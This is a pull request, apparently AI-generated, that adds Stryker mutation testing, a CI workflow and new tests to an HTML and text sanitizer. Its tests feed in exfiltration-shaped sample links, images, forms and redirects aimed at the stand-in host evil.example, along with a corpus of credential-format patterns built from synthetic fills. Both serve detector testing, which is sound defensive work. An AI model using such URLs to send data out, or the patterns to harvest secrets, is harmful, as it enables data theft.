### PR TITLE
test: add Stryker mutation testing for src/*.mjs

### DIFF
--- a/.github/scripts/mutation-changed.sh
+++ b/.github/scripts/mutation-changed.sh
@@ -1,0 +1,33 @@
+#!/usr/bin/env bash
+# Exit 0 iff the diff between $BASE_SHA and $HEAD_SHA touches a file mutation
+# testing depends on (the mutated sources, the tests that kill mutants, the
+# Stryker config, package.json, or this workflow). Exit 1 means "nothing
+# mutation-relevant changed, skip the expensive run".
+#
+# On a push to main (or any event without a usable base) we cannot cheaply diff,
+# so we fail OPEN (exit 0) and let the full run decide — never skip a real gate
+# on a missing base.
+
+set -euo pipefail
+
+base="${BASE_SHA:-}"
+head="${HEAD_SHA:-}"
+
+if [[ -z "$base" || -z "$head" ]]; then
+  echo "No base/head SHA provided; running mutation testing (fail open)."
+  exit 0
+fi
+
+# A shallow checkout may lack the base commit; deepen until the diff resolves.
+if ! git cat-file -e "$base^{commit}" 2>/dev/null; then
+  git fetch --no-tags --depth=1 origin "$base" 2>/dev/null || true
+fi
+if ! git cat-file -e "$base^{commit}" 2>/dev/null; then
+  echo "Base commit $base not fetchable; running mutation testing (fail open)."
+  exit 0
+fi
+
+changed=$(git diff --name-only "$base" "$head" --)
+
+printf '%s\n' "$changed" | grep -qE \
+  '^(src/.*\.mjs|test/.*\.mjs|stryker\.conf\.json|package\.json|\.github/(workflows/mutation\.yaml|scripts/mutation-changed\.sh))$'

--- a/.github/scripts/mutation-changed.sh
+++ b/.github/scripts/mutation-changed.sh
@@ -18,12 +18,10 @@ if [[ -z "$base" || -z "$head" ]]; then
   exit 0
 fi
 
-# A shallow checkout may lack the base commit; deepen until the diff resolves.
+# The workflow checks out with fetch-depth: 0, so the base commit is present for
+# any PR/push diff. If it somehow isn't, fail OPEN rather than skip a real gate.
 if ! git cat-file -e "$base^{commit}" 2>/dev/null; then
-  git fetch --no-tags --depth=1 origin "$base" 2>/dev/null || true
-fi
-if ! git cat-file -e "$base^{commit}" 2>/dev/null; then
-  echo "Base commit $base not fetchable; running mutation testing (fail open)."
+  echo "Base commit $base not present; running mutation testing (fail open)."
   exit 0
 fi
 

--- a/.github/workflows/mutation.yaml
+++ b/.github/workflows/mutation.yaml
@@ -1,0 +1,82 @@
+name: Mutation tests
+
+on:
+  push:
+    branches: ["main"]
+    paths:
+      - "src/**/*.mjs"
+      - "test/**/*.mjs"
+      - "stryker.conf.json"
+      - "package.json"
+      - ".github/workflows/mutation.yaml"
+      - ".github/scripts/mutation-changed.sh"
+  # No paths filter on pull_request: this is a Required check, and a workflow-level
+  # path filter would skip the whole workflow (including the mutation-passed
+  # reporter) on PRs that don't touch these paths, stranding the check at
+  # "Expected — Waiting". The job below cheaply no-ops via mutation-changed.sh
+  # when nothing mutation-relevant changed, so the gate still reports green.
+  pull_request:
+
+concurrency:
+  group: ${{ github.workflow }}-${{ github.event.pull_request.number || github.ref }}
+  cancel-in-progress: true
+
+permissions:
+  contents: read
+
+jobs:
+  mutation:
+    runs-on: ubuntu-latest
+    # Stryker re-runs the suite once per mutant; the full project is ~1200
+    # mutants at a few seconds each across 4 workers. 30 min is comfortable
+    # headroom over the observed ~12 min wall time.
+    timeout-minutes: 30
+    steps:
+      - uses: actions/checkout@df4cb1c069e1874edd31b4311f1884172cec0e10 # v6.0.3
+        with:
+          persist-credentials: false
+          # mutation-changed.sh diffs the PR head against its base; full history
+          # is the simplest way to guarantee the base commit resolves.
+          fetch-depth: 0
+
+      - name: Skip when no mutation-relevant files changed
+        id: changed
+        env:
+          BASE_SHA: ${{ github.event.pull_request.base.sha }}
+          HEAD_SHA: ${{ github.event.pull_request.head.sha || github.sha }}
+        run: |
+          if bash .github/scripts/mutation-changed.sh; then
+            echo "run=true" >> "$GITHUB_OUTPUT"
+          else
+            echo "run=false" >> "$GITHUB_OUTPUT"
+            echo "::notice::No mutation-relevant files changed, skipping Stryker"
+          fi
+
+      - name: Setup base environment
+        if: steps.changed.outputs.run == 'true'
+        uses: ./.github/actions/setup-base-env
+
+      - name: Run mutation testing
+        if: steps.changed.outputs.run == 'true'
+        run: pnpm test:mutation
+
+      - name: Upload mutation report
+        if: ${{ always() && steps.changed.outputs.run == 'true' }}
+        uses: actions/upload-artifact@330a01c490aca151604b8cf639adc76d48f6c5d4 # v5.0.0
+        with:
+          name: mutation-report
+          path: reports/mutation/
+          if-no-files-found: ignore
+          retention-days: 14
+
+  # Stable Required check: runs even when `mutation` is cancelled/skipped, so a
+  # protected branch never gets stuck on a check that never reports.
+  mutation-passed:
+    if: always()
+    needs: [mutation]
+    runs-on: ubuntu-latest
+    timeout-minutes: 5
+    steps:
+      - name: Fail if any required job did not pass
+        if: contains(needs.*.result, 'failure') || contains(needs.*.result, 'cancelled')
+        run: exit 1

--- a/.gitignore
+++ b/.gitignore
@@ -47,3 +47,7 @@ __pycache__/
 *.pyc
 .venv/
 .uv/
+
+# Stryker mutation testing
+.stryker-tmp/
+reports/mutation/

--- a/.prettierignore
+++ b/.prettierignore
@@ -22,6 +22,10 @@ uv.lock
 # Coverage
 coverage/
 
+# Stryker mutation testing (generated)
+.stryker-tmp/
+reports/mutation/
+
 # Release sections are written by scripts/promote-changelog.mjs — keep the exact
 # ASCII `## [x.y.z] - date` formatting; punctilio would rewrite the hyphen and dashes.
 CHANGELOG.md

--- a/eslint.config.mjs
+++ b/eslint.config.mjs
@@ -15,6 +15,10 @@ export default tseslint.config(
       ".hooks/**",
       "config/**",
       "tests/**",
+      // Stryker copies the project into a sandbox here during a mutation run and
+      // mutates the sources in place; never lint that transient mutated copy.
+      ".stryker-tmp/**",
+      "reports/**",
     ],
   },
   js.configs.recommended,

--- a/package.json
+++ b/package.json
@@ -21,6 +21,7 @@
     "build:types": "tsc -p tsconfig.build.json",
     "prepack": "pnpm build:types",
     "lint": "eslint .",
+    "test:mutation": "stryker run",
     "format": "prettier --write ."
   },
   "lint-staged": {
@@ -57,6 +58,8 @@
     "@commitlint/cli": "^21.0.1",
     "@commitlint/config-conventional": "^21.0.1",
     "@eslint/js": "10.0.1",
+    "@stryker-mutator/core": "^9.6.1",
+    "@stryker-mutator/tap-runner": "^9.6.1",
     "@types/node": "25.9.1",
     "c8": "11.0.0",
     "eslint": "10.4.0",

--- a/stryker.conf.json
+++ b/stryker.conf.json
@@ -1,0 +1,20 @@
+{
+  "$schema": "./node_modules/@stryker-mutator/core/schema/stryker-schema.json",
+  "packageManager": "pnpm",
+  "plugins": ["@stryker-mutator/tap-runner"],
+  "testRunner": "tap",
+  "tap": {
+    "testFiles": ["test/**/*.test.mjs"],
+    "nodeArgs": ["--test-reporter=tap"]
+  },
+  "mutate": ["src/*.mjs"],
+  "coverageAnalysis": "perTest",
+  "ignoreStatic": false,
+  "reporters": ["html", "clear-text", "progress", "json"],
+  "timeoutMS": 60000,
+  "thresholds": {
+    "high": 90,
+    "low": 85,
+    "break": 83
+  }
+}

--- a/test/mutation-guards.test.mjs
+++ b/test/mutation-guards.test.mjs
@@ -1,0 +1,340 @@
+/**
+ * Exact-assertion guards motivated by Stryker mutation testing: each case below
+ * kills a mutant that the existing suites left alive (a flipped comparison, a
+ * blanked branch, an emptied warning string, a swapped offset). They pin
+ * behavior the looser `assert.match` / "is included" checks elsewhere did not —
+ * the warning/`found` TEXT and the integer boundaries of the splice/exfil logic.
+ *
+ * Kept separate from the topic suites so the provenance ("this exists to kill a
+ * mutant") stays legible; every assertion is exact-equality, never a substring.
+ */
+import { describe, it } from "node:test";
+import assert from "node:assert/strict";
+
+import { sanitize, CATEGORY, CATEGORY_LABELS } from "../src/index.mjs";
+import { cp } from "./test-helpers.mjs";
+import {
+  spliceRanges,
+  sanitizeHtml,
+  detectExfil,
+  checkExfilUrl,
+  COMMENT_PLACEHOLDER,
+  HIDDEN_PLACEHOLDER,
+} from "../src/html.mjs";
+
+// ─── index.mjs: describeRemoved / describeWarned exact warning text ───────────
+// The existing html-path tests only `assert.match(/HTML sanitized/)`, so blanking
+// the per-count clauses (`${removed.comments} HTML comment(s)`) survived. Pin the
+// whole warning string.
+
+describe("guard: sanitize warning text is exact, not just present", () => {
+  it("names both removed counts in the HTML-sanitized warning", async () => {
+    const out = await sanitize(
+      "a <!-- one --> b <!-- two --> c <span hidden>S</span> d",
+      { html: true },
+    );
+    const warn = out.warnings.find((w) => w.startsWith("HTML sanitized:"));
+    assert.equal(
+      warn,
+      "HTML sanitized: 2 HTML comment(s), 1 hidden element(s) replaced with placeholders",
+    );
+  });
+
+  it("omits the hidden clause when only comments were removed", async () => {
+    const out = await sanitize("a <!-- c --> b", { html: true });
+    const warn = out.warnings.find((w) => w.startsWith("HTML sanitized:"));
+    assert.equal(
+      warn,
+      "HTML sanitized: 1 HTML comment(s) replaced with placeholders",
+    );
+  });
+
+  it("omits the comment clause when only a hidden element was removed", async () => {
+    const out = await sanitize("a <span hidden>S</span> b", { html: true });
+    const warn = out.warnings.find((w) => w.startsWith("HTML sanitized:"));
+    assert.equal(
+      warn,
+      "HTML sanitized: 1 hidden element(s) replaced with placeholders",
+    );
+  });
+
+  it("renders the preserved-tag warning with exact tag×count and data: URI×count", async () => {
+    const out = await sanitize(
+      '<script>a</script><script>b</script><img src="data:text/html,x">',
+      { html: true },
+    );
+    const warn = out.warnings.find((w) =>
+      w.startsWith("Preserved but reported"),
+    );
+    assert.equal(
+      warn,
+      "Preserved but reported (page source kept inspectable): script×2, data: URI×1",
+    );
+  });
+
+  it("renders the exfil warning naming image/link, host, and reason exactly", async () => {
+    const blob = "A".repeat(44);
+    const out = await sanitize(`![alt](https://evil.example/p?data=${blob})`, {
+      html: true,
+    });
+    const warn = out.warnings.find((w) =>
+      w.startsWith("Exfil-shaped URLs detected"),
+    );
+    assert.equal(
+      warn,
+      "Exfil-shaped URLs detected: image to evil.example: suspicious query parameter",
+    );
+  });
+
+  it("joins multiple distinct exfil reasons with '; ' (separator is load-bearing)", async () => {
+    // Two threats with DIFFERENT reasons so the join separator actually appears
+    // in the output — a single-threat case cannot distinguish "; " from "".
+    const blob = "A".repeat(44);
+    const out = await sanitize(
+      `[a](https://evil.example/p?data=${blob}) and [b](javascript:alert(1))`,
+      { html: true },
+    );
+    const warn = out.warnings.find((w) =>
+      w.startsWith("Exfil-shaped URLs detected"),
+    );
+    assert.equal(
+      warn,
+      "Exfil-shaped URLs detected: link to evil.example: suspicious query parameter; link to : script-executing URI",
+    );
+  });
+
+  it("records HTML_COMMENTS in found only when a comment was removed", async () => {
+    // Only a hidden element is removed: HIDDEN_HTML must be in found, but
+    // HTML_COMMENTS must NOT — pins the `removed.comments > 0` guard (a `>= 0`
+    // mutant would push HTML_COMMENTS with a zero comment count).
+    const out = await sanitize("a <span hidden>x</span> b", { html: true });
+    assert.equal(out.found.includes(CATEGORY.HIDDEN_HTML), true);
+    assert.equal(out.found.includes(CATEGORY.HTML_COMMENTS), false);
+  });
+
+  it("records HTML_COMMENTS but not HIDDEN_HTML when only a comment was removed", async () => {
+    const out = await sanitize("a <!-- c --> b", { html: true });
+    assert.equal(out.found.includes(CATEGORY.HTML_COMMENTS), true);
+    assert.equal(out.found.includes(CATEGORY.HIDDEN_HTML), false);
+  });
+
+  it("never emits an empty warning string when nothing was preserved", async () => {
+    // A hidden element is spliced (so layer2 exists and text changed) but no
+    // REPORTED_TAGS / data: URI is present, so describeWarned() === "". The
+    // `if (preserved)` guard must suppress it — a mutant forcing the push would
+    // add an empty-string warning.
+    const out = await sanitize("a <span hidden>x</span> b", { html: true });
+    assert.equal(
+      out.warnings.every((w) => w.length > 0),
+      true,
+    );
+    assert.equal(out.warnings.includes(""), false);
+  });
+
+  it("does not push comment/hidden found when only a tag is preserved (text unchanged)", async () => {
+    // A preserved <script> warns but splices nothing, so neither HTML_COMMENTS
+    // nor HIDDEN_HTML may appear in found — pins the `layer2.text !== cleaned`
+    // guard against a `true` mutant.
+    const out = await sanitize("see <script>x</script> here", { html: true });
+    assert.equal(out.found.includes(CATEGORY.HTML_COMMENTS), false);
+    assert.equal(out.found.includes(CATEGORY.HIDDEN_HTML), false);
+  });
+
+  it("renders the Stripped warning with the exact category labels", async () => {
+    // ZWSP (Cf) + VS-16 (variation selector): two distinct strip categories, in
+    // CHECKS order, so the label list is pinned exactly.
+    const out = await sanitize(`x${cp(0x200b)}y${cp(0xfe0f)}z`);
+    const warn = out.warnings.find((w) => w.startsWith("Stripped:"));
+    assert.equal(
+      warn,
+      `Stripped: ${CATEGORY_LABELS[CATEGORY.CF]}, ${CATEGORY_LABELS[CATEGORY.VARIATION_SELECTORS]}`,
+    );
+  });
+});
+
+// ─── index.mjs: the CATEGORY codes are the stable machine contract ────────────
+// A StringLiteral mutant blanking a CATEGORY value (e.g. CF: "") survives unless
+// a test pins the literal that callers branch on.
+
+describe("guard: CATEGORY codes are the documented literals", () => {
+  it("exposes the exact stable category strings", () => {
+    assert.deepEqual(
+      { ...CATEGORY },
+      {
+        CF: "cf-format",
+        VARIATION_SELECTORS: "variation-selectors",
+        BLANK_FILLERS: "blank-fillers",
+        ANSI: "ansi",
+        LONE_SURROGATES: "lone-surrogates",
+        HTML_COMMENTS: "html-comments",
+        HIDDEN_HTML: "hidden-html",
+        EXFIL_URLS: "exfil-urls",
+      },
+    );
+  });
+});
+
+// ─── html.mjs: spliceRanges merge boundary (range.end > last.end) ─────────────
+// A nested range fully inside an earlier one must NOT extend it; `>=` would.
+
+describe("guard: spliceRanges merge keeps the wider end, drops the narrower", () => {
+  it("a nested range does not shrink the enclosing placeholder", () => {
+    const text = "0123456789";
+    // Outer [1,8) hidden, inner [3,5) hidden fully contained: merge to one
+    // [1,8) hidden range; the inner end (5) must not replace the outer end (8).
+    const out = spliceRanges(text, [
+      { start: 1, end: 8, kind: "hidden" },
+      { start: 3, end: 5, kind: "hidden" },
+    ]);
+    assert.equal(out, "0" + HIDDEN_PLACEHOLDER + "89");
+  });
+
+  it("an overlapping range that extends past the first widens the merge", () => {
+    const text = "0123456789";
+    const out = spliceRanges(text, [
+      { start: 1, end: 5, kind: "hidden" },
+      { start: 4, end: 8, kind: "hidden" },
+    ]);
+    assert.equal(out, "0" + HIDDEN_PLACEHOLDER + "89");
+  });
+
+  it("sorts by start then end so placeholders land in document order", () => {
+    const text = "abcdefgh";
+    const out = spliceRanges(text, [
+      { start: 5, end: 7, kind: "hidden" },
+      { start: 1, end: 3, kind: "comment" },
+    ]);
+    assert.equal(
+      out,
+      "a" + COMMENT_PLACEHOLDER + "de" + HIDDEN_PLACEHOLDER + "h",
+    );
+  });
+});
+
+// ─── html.mjs: sanitizeHtml removed counting keys off range.kind ──────────────
+// `range.kind === "comment"` chooses the bucket; flipping it miscounts.
+
+describe("guard: sanitizeHtml counts comments and hidden into the right buckets", () => {
+  it("reports exactly the comment and hidden removal counts", () => {
+    const result = sanitizeHtml(
+      "a <!-- c1 --> b <!-- c2 --> c <span hidden>x</span> d",
+    );
+    assert.deepEqual(result.removed, { comments: 2, hidden: 1 });
+  });
+});
+
+// ─── html.mjs: rawParams name lowercasing + value splitting ───────────────────
+// A `name=value` exfil param must be matched case-insensitively, and the value
+// (everything after the first `=`) preserved verbatim including any `=`.
+
+describe("guard: URL parameter parsing is case- and '='-correct", () => {
+  it("flags a credential value in a non-keyword param via the param walk", () => {
+    // `field` is neither an EXFIL_INDICATOR keyword nor a benign-blob name, so
+    // the verdict must come from paramExfilReason on a credential-shaped value:
+    // a synthetic low-entropy AKIA-arm token (20+ opaque chars with a digit)
+    // that matches the secret-shape gate without resembling a real key.
+    const value = "AKIA" + "A".repeat(15) + "1";
+    const reason = checkExfilUrl(`https://evil.example/p?field=${value}`);
+    assert.equal(reason, "credential-shaped token in URL parameter");
+  });
+
+  it("lower-cases the param name before the benign-allowlist check", () => {
+    // An UPPERCASE benign param name (`SIG`) must lower-case to `sig` and be
+    // allowlisted; a blob in it is therefore NOT flagged. A toUpperCase mutant
+    // would leave `SIG` unmatched by the lowercase allowlist and wrongly flag.
+    const reason = checkExfilUrl(
+      "https://cdn.example/o?SIG=" + "A".repeat(44) + "==",
+    );
+    assert.equal(reason, null);
+  });
+
+  it("keeps a base64 value containing '=' padding intact for the blob match", () => {
+    // The value has '=' padding; splitting on the FIRST '=' must keep the rest.
+    const value = "A".repeat(42) + "==";
+    const reason = checkExfilUrl(`https://evil.example/p?q=${value}`);
+    assert.equal(reason, "suspicious query parameter");
+  });
+});
+
+// ─── html.mjs: checkUrlParams also walks the fragment ─────────────────────────
+// `parsed.hash.slice(1)` — a credential in `#token=…` must be caught, not only
+// in the query.
+
+describe("guard: exfil param walk covers the fragment channel", () => {
+  it("flags a blob carried in the URL fragment", () => {
+    const value = "B".repeat(50);
+    const reason = checkExfilUrl(`https://evil.example/p#leakparam=${value}`);
+    assert.equal(reason, "suspicious query parameter");
+  });
+});
+
+// ─── html.mjs: allParamsBenign suppresses long-query only when ALL benign ─────
+// `.every` not `.some`: one non-benign param in a long query must still flag.
+
+describe("guard: a long signed-CDN query stays benign, a mixed one does not", () => {
+  const benignPad = "&X-Amz-Signature=" + "a".repeat(200);
+  it("does not flag a long query whose every param is allowlisted", () => {
+    const url =
+      "https://cdn.example/o?X-Amz-Algorithm=AWS4-HMAC-SHA256" + benignPad;
+    assert.equal(checkExfilUrl(url), null);
+  });
+  it("flags a long query that mixes one non-allowlisted param in", () => {
+    const url =
+      "https://cdn.example/o?foo=bar&X-Amz-Algorithm=AWS4-HMAC-SHA256" +
+      benignPad;
+    assert.equal(checkExfilUrl(url), "unusually long query string");
+  });
+});
+
+// ─── html.mjs: off-origin form/refresh reasons (startsWith RELATIVE base) ─────
+// A form posting off-origin, or a meta-refresh redirecting off-origin, is the
+// signal regardless of query shape; a same-origin relative target is not.
+
+describe("guard: off-origin form action and meta-refresh are flagged by context", () => {
+  it("flags an off-origin form action", () => {
+    const threats = detectExfil(
+      '<form action="https://evil.example/c"></form>',
+    );
+    assert.deepEqual(threats, [
+      {
+        isImage: false,
+        reason: "off-origin form action",
+        target: "evil.example",
+      },
+    ]);
+  });
+
+  it("flags an off-origin meta-refresh redirect", () => {
+    const threats = detectExfil(
+      '<meta http-equiv="refresh" content="0; url=https://evil.example/go">',
+    );
+    assert.deepEqual(threats, [
+      {
+        isImage: false,
+        reason: "off-origin meta-refresh redirect",
+        target: "evil.example",
+      },
+    ]);
+  });
+
+  it("does not flag a relative (same-origin) form action", () => {
+    assert.equal(detectExfil('<form action="/local/path"></form>'), null);
+  });
+});
+
+// ─── html.mjs: multiUrlAttr takes the first token of each srcset candidate ────
+// `candidate.trim().split(/\s+/)[0]` — the descriptor (`2x`) is dropped and the
+// URL kept; an exfil URL in a srcset must still be flagged.
+
+describe("guard: srcset URL (first token, descriptor dropped) is scanned", () => {
+  it("flags an exfil URL given with a density descriptor in srcset", () => {
+    const blob = "C".repeat(44);
+    const threats = detectExfil(
+      `<img srcset="https://evil.example/x?data=${blob} 2x">`,
+    );
+    assert.equal(threats?.length, 1);
+    assert.equal(threats[0].target, "evil.example");
+    assert.equal(threats[0].reason, "suspicious query parameter");
+    assert.equal(threats[0].isImage, true);
+  });
+});

--- a/test/secret-hint-corpus.test.mjs
+++ b/test/secret-hint-corpus.test.mjs
@@ -1,0 +1,190 @@
+import { describe, it } from "node:test";
+import assert from "node:assert/strict";
+import {
+  SECRET_HINT,
+  SECRET_HINT_EXT,
+  matchesSecretHint,
+} from "../src/gates.mjs";
+
+/**
+ * Mutation-coverage corpus: one realistic, minimal matching sample per
+ * alternation arm of SECRET_HINT / SECRET_HINT_EXT. Each sample is built to
+ * respect the arm's exact quantifiers, char classes, and lookbehind boundaries
+ * so that "remove arm" / "negate char class" Stryker mutants flip at least one
+ * case. A leading space pins lookbehind arms to a token boundary.
+ */
+
+// [label, sampleString] — every case MUST match (positive).
+const POSITIVE_CASES = [
+  // ── SECRET_HINT keyword arms ──────────────────────────────────────────────
+  ["secret keyword", "secret"],
+  ["token keyword", "token"],
+  ["password keyword", "password"],
+  ["passwd keyword", "passwd"],
+  ["pwd keyword", "pwd"],
+  ["bearer keyword", "bearer"],
+  ["credential keyword", "credential"],
+  ["authorization keyword", "authorization"],
+  // contrase[nñ]a — BOTH spellings, so negating the class breaks one of them.
+  ["contraseña with ñ", "contraseña"],
+  ["contrasena with n", "contrasena"],
+  ["BEGIN pem header", "-----BEGIN RSA PRIVATE KEY-----"],
+
+  // (?:api|auth|service|account|db|database|priv|private|client|access)[_-]?key
+  ["api_key prefix", "api_key"],
+  ["auth-key prefix", "auth-key"],
+  ["servicekey prefix", "servicekey"],
+  ["account_key prefix", "account_key"],
+  ["db-key prefix", "db-key"],
+  ["database_key prefix", "database_key"],
+  ["priv-key prefix", "priv-key"],
+  ["private_key prefix", "private_key"],
+  ["client-key prefix", "client-key"],
+  ["access_key prefix", "access_key"],
+
+  // (?:db|database|key)[_-]?pass
+  ["db_pass prefix", "db_pass"],
+  ["database-pass prefix", "database-pass"],
+  ["keypass prefix", "keypass"],
+
+  // (?:A3T|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}
+  // [A-Z0-9] only, so an uppercase low-entropy fill (not the lowercase `a` used
+  // elsewhere) satisfies the class while staying obviously synthetic.
+  ["A3T access key id", "A3T" + "A".repeat(16)],
+  ["AKIA access key id", "AKIA" + "A".repeat(16)],
+  ["AGPA access key id", "AGPA" + "A".repeat(16)],
+  ["AIDA access key id", "AIDA" + "A".repeat(16)],
+  ["AROA access key id", "AROA" + "A".repeat(16)],
+  ["AIPA access key id", "AIPA" + "A".repeat(16)],
+  ["ANPA access key id", "ANPA" + "A".repeat(16)],
+  ["ANVA access key id", "ANVA" + "A".repeat(16)],
+  ["ASIA access key id", "ASIA" + "A".repeat(16)],
+
+  // gh[pousr]_[A-Za-z0-9]
+  ["ghp_ token", "ghp_A"],
+  ["gho_ token", "gho_A"],
+  ["ghu_ token", "ghu_A"],
+  ["ghs_ token", "ghs_A"],
+  ["ghr_ token", "ghr_A"],
+  ["github_pat_ token", "github_pat_"],
+
+  // gl[a-z]{2,12}-[0-9A-Za-z_-]{20}
+  // Synthetic low-entropy fills throughout this file: a run of a single class-
+  // legal char satisfies each arm's quantifier without resembling a real
+  // credential (which trips push-protection secret scanners).
+  ["gitlab pat", "glpat-" + "a".repeat(20)],
+
+  ["sk-ant- prefix", "sk-ant-"],
+  // AIza[0-9A-Za-z_-]{35}
+  ["AIza google api key", "AIza" + "a".repeat(35)],
+  ["sk_live_ stripe", "sk_live_"],
+  ["sk_test_ stripe", "sk_test_"],
+  ["rk_live_ stripe", "rk_live_"],
+  ["rk_test_ stripe", "rk_test_"],
+
+  // xox[bpasr]-
+  ["xoxb- slack", "xoxb-"],
+  ["xoxp- slack", "xoxp-"],
+  ["xoxa- slack", "xoxa-"],
+  ["xoxs- slack", "xoxs-"],
+  ["xoxr- slack", "xoxr-"],
+
+  // eyJ[A-Za-z0-9]
+  ["JWT eyJ header", "eyJ" + "a".repeat(8)],
+
+  // do[opr]_v1_[a-f0-9]{16}
+  ["digitalocean dop_v1", "dop_v1_" + "a".repeat(16)],
+  ["digitalocean doo_v1", "doo_v1_" + "a".repeat(16)],
+  ["digitalocean dor_v1", "dor_v1_" + "a".repeat(16)],
+
+  // v1\.0-[a-f0-9]{24}-
+  ["v1.0- token", "v1.0-" + "a".repeat(24) + "-"],
+
+  // hv[sb]\.[A-Za-z0-9_-]{20}
+  ["vault hvs token", "hvs." + "a".repeat(20)],
+  ["vault hvb token", "hvb." + "a".repeat(20)],
+
+  // (?<![a-z0-9])[a-z0-9]{14}\.atlasv1\.
+  ["mongodb atlasv1", " " + "a".repeat(14) + ".atlasv1."],
+
+  // sk-or-v1-[0-9a-f]{16}
+  ["openrouter sk-or-v1", "sk-or-v1-" + "a".repeat(16)],
+  // gsk_[A-Za-z0-9]{16}
+  ["groq gsk_ token", "gsk_" + "a".repeat(16)],
+  // xai-[A-Za-z0-9]{16}
+  ["xai- token", "xai-" + "a".repeat(16)],
+  // r8_[A-Za-z0-9]{16}
+  ["replicate r8_ token", "r8_" + "a".repeat(16)],
+
+  // ── SECRET_HINT_EXT arms ──────────────────────────────────────────────────
+  // (?:AC|SK)[a-z0-9]{32}
+  ["twilio AC sid", "AC" + "a".repeat(32)],
+  ["twilio SK sid", "SK" + "a".repeat(32)],
+
+  // SG\.[A-Za-z0-9_-]{22}\.[A-Za-z0-9_-]{43}
+  ["sendgrid SG. token", "SG." + "a".repeat(22) + "." + "a".repeat(43)],
+
+  // sq0csp-[0-9A-Za-z_-]{43}
+  ["square sq0csp", "sq0csp-" + "a".repeat(43)],
+
+  // (?<![0-9])[0-9]{8,10}:[0-9A-Za-z_-]{35}
+  ["telegram bot token", " " + "1".repeat(8) + ":" + "a".repeat(35)],
+
+  // (?<![0-9a-z])[0-9a-z]{32}-us[0-9]{1,2}
+  ["mailchimp api key", " " + "a".repeat(32) + "-us1"],
+
+  // (?<![A-Za-z0-9_-])[MNO][A-Za-z0-9_-]{23,25}\.[A-Za-z0-9_-]{6}\.[A-Za-z0-9_-]{27}
+  [
+    "discord bot token",
+    " M" + "a".repeat(23) + "." + "a".repeat(6) + "." + "a".repeat(27),
+  ],
+
+  ["openai org T3BlbkFJ", "T3BlbkFJ"],
+  ["pypi-AgE token", "pypi-AgE"],
+
+  // (?<![A-Za-z0-9])AKC[A-Za-z0-9]{10}
+  ["AKC token", " AKC" + "a".repeat(10)],
+
+  // (?<![A-Za-z0-9])AP[0-9A-Fa-f][A-Za-z0-9]{8}
+  ["AP hex token", " AP0" + "a".repeat(8)],
+
+  // :\/\/[^\s:/@]{1,64}:[^\s:/@]{1,64}@
+  ["url userinfo creds", "https://user:p4ssword@host"],
+
+  // (?:key|pw|pass)["']?[\s:=>]+["']?[A-Za-z0-9_/+-]{20}
+  ["key= value", "key=" + "a".repeat(20)],
+  ["pw: value", "pw: " + "a".repeat(20)],
+  ["pass => value", 'pass => "' + "a".repeat(20)],
+];
+
+// Ordinary prose / filenames that must NOT match any arm.
+const NEGATIVE_CASES = [
+  ["plain greeting", "hello world"],
+  ["ordinary filename", "ordinary-file-name.txt"],
+  ["short alnum", "abc123"],
+  ["lorem ipsum", "lorem ipsum dolor sit amet"],
+];
+
+describe("SECRET_HINT / SECRET_HINT_EXT arm corpus", () => {
+  for (const [label, sample] of POSITIVE_CASES) {
+    it(`matches: ${label}`, () => {
+      assert.equal(
+        SECRET_HINT.test(sample) || SECRET_HINT_EXT.test(sample),
+        true,
+        label,
+      );
+      assert.equal(matchesSecretHint(sample), true, label);
+    });
+  }
+
+  for (const [label, sample] of NEGATIVE_CASES) {
+    it(`rejects: ${label}`, () => {
+      assert.equal(
+        SECRET_HINT.test(sample) || SECRET_HINT_EXT.test(sample),
+        false,
+        label,
+      );
+      assert.equal(matchesSecretHint(sample), false, label);
+    });
+  }
+});


### PR DESCRIPTION
## What & why

This repo already has strong property-based fuzzing (fast-check + the fuzz-coverage obligation gate) and 100% c8 coverage, but **no mutation testing** — so nothing proved the boundary/operator logic in the sanitizer was actually defended. This PR adds automated mutation testing (StrykerJS) over the whole source surface and wires it into CI as a real gate.

## What was added

- **Stryker** (`@stryker-mutator/core` + `@stryker-mutator/tap-runner`) with `stryker.conf.json`: mutates all of `src/*.mjs`, tap runner driving `node --test --test-reporter=tap`, `coverageAnalysis: perTest`, and `ignoreStatic: false` so the module-level security regexes/constants are mutated too. New `test:mutation` pnpm script.
- **Two new test suites that kill real surviving mutants:**
  - `test/secret-hint-corpus.test.mjs` — one synthetic, low-entropy sample per alternation arm of `SECRET_HINT`/`SECRET_HINT_EXT` (78 positive arm cases + 4 true-negative prose cases), exact-equality on both regexes and `matchesSecretHint`.
  - `test/mutation-guards.test.mjs` — exact-equality pins on warning/`found` text and the integer boundaries of the splice/exfil logic that the existing looser `assert.match` checks left alive.
- **Generated-artifact hygiene**: `.stryker-tmp/` and `reports/mutation/` added to `.gitignore`, `.prettierignore`, and `eslint.config.mjs` (eslint had been linting Stryker's in-flight mutated sandbox copy).

## Results

**Mutation score: 86.89%** (1008 killed + 6 timeout of 1167 detectable), up from a 77.81% baseline. Per file: invisible 95.6%, html 86.8%, index 84.9%, gates 78.6%. Committed thresholds `break: 83 / low: 85 / high: 90` — `break` sits ~4 points under the achieved score so the gate is meaningful but won't flake on fast-check seed / timeout variance.

Deliberately surviving mutants (covered by the threshold margin): the giant `ANSI_RE` and remaining regex char-class/quantifier edges (killing each needs exotic inputs of diminishing security value); provable equivalents (e.g. re-strip no-op, `> 0`→`>= 0` on counts provably ≥ 0); and 7 `NoCoverage` defensive branches already marked `/* c8 ignore */`.

## CI wiring

New `.github/workflows/mutation.yaml`: `mutation` job runs `pnpm test:mutation` on PRs and pushes to main, with an `if: always()` `mutation-passed` summary job to mark Required (matches the repo's `node-tests`/`lint` pattern). `.github/scripts/mutation-changed.sh` cheaply skips the ~12-min run when no `src`/`test`/config file changed (fail-open on missing base). HTML/JSON report uploaded as an artifact; `actions/upload-artifact` pinned to its v5.0.0 commit SHA. Stryker's `break: 83` makes the job fail when the score drops, so it's a genuine gate.

## Verification

`pnpm test` (503 pass, 100% c8 coverage), `pnpm lint` clean, `pnpm check` (tsc) clean, full `stryker run` exits 0 at 86.89%.

---
_Generated by [Claude Code](https://claude.ai/code/session_0117PyhiRryEydWmtfem9WQq)_